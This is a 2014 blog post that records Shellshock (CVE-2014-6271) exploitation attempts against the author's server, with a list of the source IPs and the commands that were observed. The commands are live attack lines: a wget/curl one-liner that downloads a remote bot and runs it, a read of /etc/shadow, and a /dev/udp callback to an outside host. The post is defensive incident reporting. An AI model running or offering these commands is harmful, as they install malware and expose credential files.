Some Personal Shellshock Stats

ShellsockIn April 2014, the Internet shivered when we faced the “heartbleed” bug in the OpenSSL library. It makes lot of noise across the security community and was even covered by regular media. Such issue could never happen again, right?

Never say never! Last week, a new storm in the Internet with “shellsock” or best known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed looses definitively its pole position on the top threats. It is very easy to exploit, it affects MANY applications or services that spawn other processes using call like system() on PHP or the well-know mod_cgi provided by Apache. Not only public websites can be affected by also some critical services like:

  • the ForceCommand feature in sshd
  • scripts executed by unspecified DHCP clients,
  • network access control serices

So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!

Some security researchers and bloggers immediately started to scan the Internet to have a better idea of the impact of this vulnerability on public services. Of course, bad guy also started to do the same and my server was hit several times (94). Until today, I detected the following IP addresses:

109.80.232.48
109.95.210.196
119.82.75.205
128.199.223.129
128.204.199.209
166.78.61.142
176.10.107.180
178.32.181.108
2001:4800:7812:514:1b50:2e05:ff04:c849:52116
209.126.230.72
24.251.197.244
54.251.83.67
62.210.75.170
79.99.187.98
80.110.67.10
83.166.234.133
89.207.135.125
89.248.172.139
93.103.21.231

Here is a list of commands/scripts tested:

/bin/ping -c 1 198.101.206.138
/bin/bash -c "echo testing9123123"; /bin/uname -a
/sbin/ifconfig
/bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
/bin/cat /etc/shadow
echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
/bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
/bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
/bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'

Personally, I like the one which tries to use the built-in support of sockets via psuedo files like “/dev/[tcp|udp]/<host>/<port>“. This is a nice feature of bash but it is disabled on most distribution (for security reason presicely).

4 comments

  1. @Rafael, the moment the news got out, people started to write scans. Most of the scans are just to see how much devices are vulnerable, in most cases they only do a ping back to the scanner. Other scans try to copy your paswd or other interesting files. And then there are also the scanners which download (e.g. with wget) a malicious shell and run it

  2. I almost fell of my chair seeing the last one (BruCON). You might want to check brucon.org if you want to know more about it.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.